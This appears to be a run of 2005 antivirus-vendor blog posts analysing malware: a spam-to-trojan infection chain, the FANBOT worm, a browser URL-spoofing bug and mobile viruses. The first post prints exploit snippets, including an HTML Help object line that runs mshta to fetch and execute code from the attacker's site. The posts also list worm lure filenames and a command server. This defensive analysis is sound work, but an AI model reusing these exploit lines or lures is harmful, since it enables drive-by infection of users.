The thing about this is that one malware creates a link of event which ultimately leads a system to be infected with a number of other malwares. From one malware the execution goes to another one until the flow is finished, which by this time the system is already infected with anything that comes up to the malware authors mind. It can be a trojan, a spyware even worms.

Here is a new example of this. The flow begins with an email which eventually leads to the system being infected by trojans…

Below is an email that was spammed just this October 22, 2005.



As you can see a link was provided by the email, fooling the user that it is a copy of the transaction invoice.

When this link is clicked it starts a chain of event which we now call the “Bouncing Malware” (ala SANS). =)
When loaded the site in the picture informs the user that an “INTERNAL SERVER ERROR” occurred. Below is a picture of the website.



No alarm there right?…Wrong!=) Looking at the source code of this site, it shows that it contains an iframe exploit, which loads these two

“http://nlpshoping.com/huindex.html”
“http://nlpshoping.com/estat.php”

The file estat.php turned out to be a “zero byte file”, but huindex.html is “very bad”.

From this html it loads the file http://nlpshoping.com/loader.exe using java applet.

Here is a code snippet from huindex.html

<APPLET CODE=”GetAccess.class” WIDTH=”1″ HEIGHT=”1″>
<PARAM NAME=”cabbase” VALUE= “{blocked}.jr”>
<param NAME=”ModulePath” value=”http://nlpshop{block}ader.exe”></applet>
</APPLET>

It then uses another exploit which allows http://nlpshoping.com/ppp.hta to be downloaded and run using vulnerability in HTML HELP (MS05-001)

<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11

style=”position:absolute;left:-1000″>

<PAR{BLOCKED}ommand” VALUE=”Related Topics”>

<PAR{BLOCKED}utton” VALUE=”Text:”>

<PAR{BLOCKED}indow” VALUE=”$global_blank”>

<PAR{BLOCKED}tem1″ VALUE=”command;javascript:document.links



[0].href=’EXEC=,mshta,http://nlpshoping.com/ppp.hta

CHM=ieshared.chm FILE=app_install.htm’%3Bdocument.links[0].click();”></OBJECT>

The file ppp.hta is a TROJAN DROPPER. It contains a vbscript which drops the file upgrade.exe in “c:windows”.

The files Upgrade.exe and loader.exe are just the same.

They download these exe files exe files

• http://nlpshoping.com/notepad.exe
  
  
• http://site.com/toolbar.exe1
  
  
• http://site.com/proxy.exe1
  
  
• http://site.com/4.exe1
  
  
• http://site.com/5.exe1

I tried getting the files from site.com but it was already down. But notepad.exe is still uploaded.

The file notepad.exe is also a TROJAN DROPPER. Among the files that it drops in the systems directory are

• winsetup.exe
  
  
• svchost.dll

All files have already been submitted to the service team and are waiting for their detection name.
So let’s review what we’ve got so far.

• an email that fools users into clicking a link.(http://nlpshoping.com/billing/order203401.html)
  
  
  
• a site (http://nlpshoping.com/billing/order203401.html) using IFRAME exploit loads another site (http://nlpshoping.com/huindex.html)
  
  
  
• huindex.html using an exploit in handling java applets loads a file named “LOADER.EXE”
  
  
  
• It also exploited a vulnerability in HTML HELP (MS05-001) to load the site http://nlpshoping.com/ppp.hta
  
  
  
• ppp.hta contains a vbs script which drops “UPGRADE.EXE”
  
  
  
• dont forget “UPGRADE.EXE” and “LOADER.EXE” are just the same file.
  
  
  
• These two files are just downloaders which downloads this file, http://nlpshoping.com/notepad.exe, among others but the other sites are already down.
  
  
  
• The file notepad.exe is a TROJAN DROPPER which installs another trojan in the system(winsetup.exe and svchost.dll).
  
  
  
• The files winsetup.exe and svchost.dll monitor internet explorer and steals user information.
  

whew! so this is why its called a “MIXED THREAT”.

But lets not forget, all these chain of events started with a single email. One that was made perfectly to make users believe that it was authentic. Actually the real reason for these “chain of events” to happen is when the user was fooled into clicking that link. Yes, he was social engineered, and so was used by the malware author for the execution of his trojan.

So as a fair warning, let’s be vigilant. Always check where your emails come from, and even then check the attachments if there are any. Plus of course it always helps to have a completely patched system.

Brief History

During the first quarter of 2005, the advent of the family of mass-mailing bot-worms called MYTOBs gave rise to the vast proliferation of so-called BOT creators or groups that thrive on and make use of the modularity, functionality and “effectiveness” of the open-source codes. I will refer to the MYTOB open source as “Hellbot” since this underground entity has been tagged as one of the most prolific in the MYTOB scene.

Barely 7 months after, one Moroccan worm writer from the MYTOB scene that goes by the handle of Diabl0, along with a Turkish partner code-named Coder, eventually rose up from the ranks and released the ZOTOB variants and they came with a blast! Incorporating a modified MYTOB code tagged as HellBot3 and an exploit code that targets the MS05-039 Vulnerability barely 3 days after the patch release, the blast eventually became an Outbreak! Even though the first two variants did not have the code for mass-mailing, it is quite evident that the MYTOB or MYDOOM code was there, and it wouldn”t be long before a mass-mailing ZOTOB appeared and it did!

Other “upgraded” BOTs (IRCBOTs, SDBOTs, BOZORIs) with the same exploit soon multiplied with the intent of outdoing each other in the BOTNET arena setting war to grab hold of each other”s zombie-network for their own malicious ends. The war soon petered out, and the original ZOTOB worms died down eventually when Diabl0 and Coder eventually got arrested barely two weeks after. Copycat ZOTOBs still appeared though, but it should be of course obvious that some other script-kiddie groups were and are still the ones responsible, what with the HellBot, HellBot3, source codes out in the open for them to cut-and-paste, modify, compile, re-compile, pack and/or compress using new and out-of-the-way unconventional file-packers and compressors or encryptors

Come September, a HellBot-group splinter script-kiddie known in the Chinese cyber-underground community as x140yu, along with the help of another kiddie known as x140d4n, has been developing a modified version of the MYTOB modules. By the first week of October, the project was then released in the wild. Its name FANBOT!

FANBOT vs MYTOB

For those asking what the differences FANBOT has over MYTOB and if it does have the same robust spreading potential, shown below are some information that may somehow shed some light …

Yes .. this IS exactly what it is… a MYTOB plus a PNP (MS05-039) exploit code PLUS some other factors which make it different (at one point or another):

1) Incorporation of a fake message box upon execution of the worm such as this:




2) Propagation via P2P (Peer-to-Peer) or file-sharing networks such as Kazaa, eDonkey and Morpheus using filenames targeting a diverse audience also including would-be virus analysts and writers alike using names such as:

• Bifrost.scr
  
• How to hack new.doc.exe
  
• how to hack.doc.exe
  
• netsky source code.scr
  
• Smashing the stack full.rtf.exe
  
• virii.scr
  
• Visual Studio Net Crack all.exe
  
• Win Longhorn re.exe
  
• Win Longhorn.doc.exe
  
• Windows 2000 Sourcecode.doc.exe
  
• Windows 2003 crack.exe
  
• Windows XP crack.exe

3) This FANBOT family is not the brainchild of any of the conventional MYTOB groups, nor of course of the ZOTOB creator (since he is behind bars already) – but the creation of an altogether different individual (presumably) that goes by the handle of x140yu with an email address of x140yu@Gmail.Com. He even specifically “points out” in some of his creations that he created this new line out of MYDOOM+SDBOT and explicitly lets out that the MYTOB “author is an idiot!!!” (see text found in the worm code below) and kills processes related to MYTOB such as hellmsn.scr and msnmsgs.exe, those related to BOZORI such as botzor.exe, and other bots such as coolbot.exe.



4) One particularly unique thing about this worm family is that it is the first to also target the Trend Micro System Cleaner by killing off any running processes of TSC.EXE.

5) Also unique among the mass-mailing bot domain, some later members of the FANBOT family now banks on the popularity of Skype as can be seen by most of the attachments the family sends out (example: Share Skype, Skype, Skype for Windows 1.4, Skype-details, Skype-document or Skype-stuffs). Email characteristics of this type include:

Subject:(Any of the following)

• Share Skype
  
  
• Share Skype.
  
  
• Skype
  
  
• Skype for Windows 1.4
  
  
• Skype for Windows 1.4 – Have you got the new Skype?
  
  
• Skype-details
  
  
• Skype-document
  
  
• Skype-info
  
  
• Skype-stuffs
  
  
• What is Skype?
  
  

Message Body



Attachment:(any of the following file names)

• readme
  
  
• Share Skype
  
  
• Skype
  
  
• Skype for Windows 1.4
  
  
• Skype-details
  
  
• Skype-document
  
  
• Skype-info
  
  
• Skype-stuffs

(with any of the following first extension names)

• BAT
  
  
• CMD
  
  
• EXE
  
  
• PIF
  
  
• SCR
  
  
• ZIP

6) FANBOT continually updates its creations by having his newer versions KILL OFF his older ones found in any target systems (like deleting phantom.exe, xiaoyu.exe, etc.)

7) Via port 5262, the IRC server jojogirl.3322.org is also being connected to by the worm family.

8) Interestingly, the worm family also attempts to connect to 28.76.115.50 which is connected to the DoD!

Introducing the worm author

Looking at the text found in the worm body shown below, it can be seen this x140yu also has a “friend” that goes by the nickname of x140d4n – from whom I gather x140yu got some of his code modules or techniques. (The entity x140d4n has got a site LOADED with backdoors and Trojans and I am digging deeper in this site as I speak!)… x140yu probably got some backdoor techniques and code modules from this x140d4n.



And yes, as I”ve mentioned earlier, the author was still struggling just last September on perfecting his creations(s), and maybe x140d4n came to his “rescue”, ergo the Special Thanks. Seen below is one example of evidence traced regarding x140yu’s early days of bot-coding struggle … x140yu WAS asking for source codes! Tsk tsk …




You can also catch him (x140yu) here:

QQ: 75…71
ICQ: 30…78
MSN: x…@…com
E-mail: x…@…com
Gmail: x…@…com

*** Email us if you need the exact contact emails and we’ll send them over _IF_ the reason _IS_ for valid and legitimate purposes _ONLY_.

x140yu also has a blogsite, as shown below. The author really has something for alphanumeric text strings!




Further cursory glance at the site reveals some more interesting things.




Hmmm .. Aha!… A BotNet?!?! The link is empty though, and milworm! Ahhh yes … this is the site (milworm) where some of the more famous exploit codes that caused outbreaks in the past have been posted. Exploit codes such as used by SASSER and ZOTOB are posted here. And from one of the strings found in FANBOT”s code found above, this is one proof the author really wants to grab any code related to ZOTOB!

What”s more, we”ve also got a snapshot of x140yu taken from the worm author”s blogsite titled “x140yu”s Photo”.


Apparently, x140yu alone or both x140yu and x140d4n are members of or in cahoots with the Brazilian-Persian “Evil Security Team” hacker group in spreading this worm, as can be seen in the mutex it creates:




Their site is located at 210.1183 and is located at Korea. It is maintained by someone called “M3hDy EviL b0y”.




What Next?

All in all, my take on this is that this is just one of those more-than-average kiddies who’s gotten the opportunity to an open HellBot, some MYDOOM and some MS05-039 exploit source codes, added his own modifications and who’s got probably some word-war with some of the MYTOB groups in the underground – and voila – a new worm!

Moreover, this is just another example of the growing intent of bot creators of infiltrating and amassing more and more zombie networks either by affecting new targets or by competing against other worm-bot authors and take hold of the zombie networks for their own purposes.

Same old same old… but like all kiddie-works, this may have some high moments (like now and probably in the next two months or so) until it just peters out eventually, or when the kiddie(s) move on to a next “pet-project” or when authorities do get a hold of them… or him… or her!… ;-p

If we should do something to stop or prevent even a starting rampage of a new worm author”s creations, we should stop it, him or her or them before they increase in the near future. The information above is a starting point, and we can… and should stop it now …

New Vulnerabilities in Skype, a little
program for making free calls over the internet, announced two
vulnerabilities in its code.


Read more about it here and here.


So for Skype users out there, an updated version which addresses
the vulnerabilities mentioned above is already uploaded in this site.

Another URL spoofing in at least two browsers has been discovered. It was first reported as a URLspoofing vulnerability in Internet Explorer. Subsequent discussions later revealed that Firefox is also vulnerable.

To create such a bug, start off with a simple link tag: <a href=""> </a>

Then within that tag, include an onClick() event. This event is triggered when the link is clicked. Then use the onClick event to include a Javascript that redirects the browser into a web page of your choice.

As you may have noticed, the redirection is done through Javascript. The redirection script can be modified such that an attacker can employ this to execute custom Javascript of the attacker's choosing. For example, it could be leveraged to perform a cross-site scripting attack.

And since this is a spoofing bug, it could be used for phishing or luring unsuspecting users into clicking malicious URLs.

Workaround

Disabling Javascript support in your browsers is an effective workaround for this spoofing bug.

Demo

Click on any URLS below for demonstration. See the underlying source code to see how the URL spoofing works. And yes, all links are safe.




Tested on:

• IE 6, Windows XP SP2
  
• Firefox v1.0.7, Windows XP SP2

First, a little light:
[Start Quote]
“Snort is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.”
[End Quote] www.snort.org

Two days ago, ISS released an advisory on a buffer overflow on Snort which may be used by worms. I admit I wasn’t paying too much attention to this when the advisory was released because… well.. because nothing hehehehe. Eeeeeniwey, what caught my attention was ISC’s Infocon Yellow, and after reading their reasoning on why this ‘is a big deal’, i thought “Oh yeeah, it IS a big deal”. Think witty.

Excerpts from ISC:
[Start Quote]
Why do we think this is a big deal:

• The exploit is rather easy to write. Yes, its specific to a particular binary, but there are a number of common binaries deployed in large numbers.
  
• It uses a single UDP packet, which can lead to very fast spreading worms.
  
• The UDP packet can be spoofed, and can use any port combination.
  
• Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.

[End Quote]

So anyway, paul and I were trying to create a POC for this (since we couldn’t find one), when suddenly!(for added drama hehehe), a new post from Full-Disclosure came in which carried a POC(albeit unfinished: only crashes target machine) for the Snort exploit (by H.D Moore of Metasploit). Oh well. At least creating a complete POC(with shellcode) will be much easier since H.D. Moore already started it hehehehe and NVW only needs the code that causes the exploit. Also, the NVW team has already been alerted on this issue as well as the POC.

We have receieved reports of an overwriting
virus infecting some computers in China. This infector locates for
files in the system and overwrites them with all 69KB of its code.
After the virus is done with the file, the latter is rendered
useless and irrecoverable.


Since the virus is only 69KB in size, file which have more than
that number of bytes retain their sizes, but their extra bytes will
no longer function. And, as for the files that have less than 69KB
in size, they become purely 69KB of virus code.


This virus is now detected as PE_NOFACE.B.

We have received a sample of a Symbian
malware that exhibits the same behaviour as of the SYMBOS_COMWAR
family.


The first generation of the malware arrives as one of the files
inside a pirated copy of SymCommander software. SymCommander is a
file management software specifically used for Symbian
phones.


The actual malicious file inside the pirated copy of SymCommander
SIS package is named cwoutcast.exe. Just like the other
SYMBOS_COMWAR variants A and B, it also propagates through MMS by
sending a copy of itself as a .SIS installer. It also propagates
through Bluetooth by sending itself in a randomly generated
filename.


It is also noticeable the embedded string on the cwoutcast.exe as
qouted below.

“CommWarrior Outcast: The dark side of Symbian
Force.

CommWarrior v2.0-PRO. Copyright (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it

in it’s original unmodified form.

With best regards from Russia.


OTMOP03KAM HET!”

The sample has been given the detection name
SYMBOS_COMWAR.C.

Cellphones may perhaps top the list of items
which are most likely stolen. It may even be more desirable now
than wallet, jewelry and watches. It is easy money for thieves
because there’s no scarcity in prospective buyers.


One of the latest technologies devised to *hopefully* lessen, if
not completely eradicate cellphone theft is a “Walking style-based
recognition” system, which incorporates the mobile device to the
way the owner walks. Yep, you heard it right, the way the owner
walks. Its main principle is based on gait, which refers
to the different aspects of a user’s movement. The system has
various sensors in order to measure the user’s gait. Of course,
upon purchase, measurements of the user’s “gaitcode” would be taken
and stored in memory, which would be checked periodically. This
checking is performed automatically and doesn’t require any input
from the owner. If the gaitcode doesn’t match, the device would
shut down, and would require proper authentication in order to
reactivate again.


This method certainly sounds promising because it could also be
applied to other electronic gadgets which caters our various
personal needs such as laptops, PDA’s, ipods, etc.


This would mean that these personal gadgets would certainly have to
be personal. Borrowing or lending them are big no-no’s
because only the authentic owner whose gaitcode matches the one in
the device would be able to use it. Come to think of it, even the
registered owner may find instances where the device won’t work for
them. Depending on how the sensors are placed, or how they measure
the movement, certain situations would lead to changes in movement.
These include being impaired in movemet when you’re injured and
must move limply or, difference in the way you walk due to
uncomfortable shoes, or difference in the pavement you walk on.
There are still lost of questions and what-if’s with regards to the
utilization of gaitcode for security enforcement. Let’s just wait
and see if it would actually be implemented…


Click this for the news.

If you have been reading news, you may have
heard of the much-awaited, much-delayed operating system succeeding
the Windows XP. The beta version of the software, Microsoft Windows
known by its code name, Longhorn previously and now Windows Vista,
is now available. And that is one big news, so is the first virus
infecting it.


On the face of it, it is not actually a major threat – and can be
in line with some of the other proof-of-concept malwares or
viruses, but this can also be seen as an effort of virus-writer
groups to target new (Microsoft) platforms at the earliest time
possible (in this case, Microsoft .NET Framework 2.0 which is
included in Windows Vista beta 1)- even if the target platform is
still in beta! Whew!


And as we know… MS Vista will indeed be big…


Let’s hold on to our horses… the MS Vista malware scene will sure
be interesting in the near future!


The malware sample is now being processed by the Service Team so
hang on for updates.

The file is now given the name PE_DONUT.B.
Based on initial analysis this malware runs on Microsoft Vista
under Microsoft DOT Net Framework 2.0 and tries to overwrite EXE
files in current directory.